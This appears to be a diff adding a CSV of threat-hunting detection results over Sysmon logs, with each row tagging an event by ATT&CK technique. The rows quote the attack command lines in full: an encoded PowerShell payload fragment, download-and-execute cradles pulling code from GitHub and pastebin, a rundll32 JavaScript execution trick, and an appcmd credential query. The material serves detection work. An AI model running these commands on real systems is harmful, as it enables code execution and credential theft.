HAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6190
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:54.515
+ 365ABB72-FE76-5CEB-0000-001077710C00
+ 2840
+ C:\Windows\System32\wbem\WMIC.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
+ 365ABB72-FE76-5CEB-0000-0010546E0C00
+ 2356
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))") in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4912
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:23.380
+ 747F3D96-6623-5D3F-0000-0010BC068800
+ 3000
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-6623-5D3F-0000-001011F68700
+ 5816
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1557680511.00795,2019-05-12T21:01:51.007950+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16497
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:01:50.781
+ 365ABB72-517E-5CD8-0000-001024D61700
+ 2952
+ C:\Windows\System32\pcalua.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Program Compatibility Assistant
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A
+ 365ABB72-516B-5CD8-0000-001087E41600
+ 3788
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4912
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:23.380
+ 747F3D96-6623-5D3F-0000-0010BC068800
+ 3000
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-6623-5D3F-0000-001011F68700
+ 5816
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4353
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-26 07:39:14.853
+ 747F3D96-AE22-5D3A-0000-001004D84E00
+ 5548
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://pastebin.com/raw/y2CjnRtH",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}
+ C:\Users\IEUser\Desktop\
+ MSEDGEWIN10\IEUser
+ 747F3D96-ABD5-5D3A-0000-0020EB990F00
+ 0xf99eb
+ 1
+ Medium
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-AE22-5D3A-0000-001096B24E00
+ 1504
+ C:\Windows\hh.exe
+ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4912
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:23.380
+ 747F3D96-6623-5D3F-0000-0010BC068800
+ 3000
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-6623-5D3F-0000-001011F68700
+ 5816
+ C:\Windows\System32\cmd.exe
+ cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16395
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.523
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16395
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.523
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16395
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 13:38:00.523
+ 365ABB72-21B8-5CD8-0000-0010BADE2600
+ 3856
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta
+ c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ IEWIN7\IEUser
+ 365ABB72-1596-5CD8-0000-0020103A0100
+ 0x13a10
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-2006-5CD8-0000-0010E0912300
+ 2936
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1966251
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ PC01.example.corp
+
+
+
+
+
+ 2019-03-19 20:36:04.206
+ 365ABB72-52B4-5C91-0000-0010355B0100
+ 1628
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-528D-5C91-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-528D-5C91-0000-001062560000
+ 484
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe")",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 417079
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 11:43:36.303
+ 747F3D96-D8E8-5F8A-0000-00102CEF7200
+ 840
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe"
+ C:\Users\IEUser\AppData\Roaming\
+ MSEDGEWIN10\IEUser
+ 747F3D96-CA8D-5F8A-0000-0020D1090A00
+ 0xa09d1
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-D8E5-5F8A-0000-0010E1BC7200
+ 2920
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10674
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-14 12:17:14.447
+ 747F3D96-FBCA-5D53-0000-0010B8664100
+ 2476
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-F419-5D53-0000-002026910200
+ 0x29126
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-F41E-5D53-0000-001067C80300
+ 4824
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 417079
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 11:43:36.303
+ 747F3D96-D8E8-5F8A-0000-00102CEF7200
+ 840
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe"
+ C:\Users\IEUser\AppData\Roaming\
+ MSEDGEWIN10\IEUser
+ 747F3D96-CA8D-5F8A-0000-0020D1090A00
+ 0xa09d1
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-D8E5-5F8A-0000-0010E1BC7200
+ 2920
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10674
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-14 12:17:14.447
+ 747F3D96-FBCA-5D53-0000-0010B8664100
+ 2476
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-F419-5D53-0000-002026910200
+ 0x29126
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-F41E-5D53-0000-001067C80300
+ 4824
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5952
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.183
+ 365ABB72-3D6F-5CEB-0000-001026B9FF00
+ 1036
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
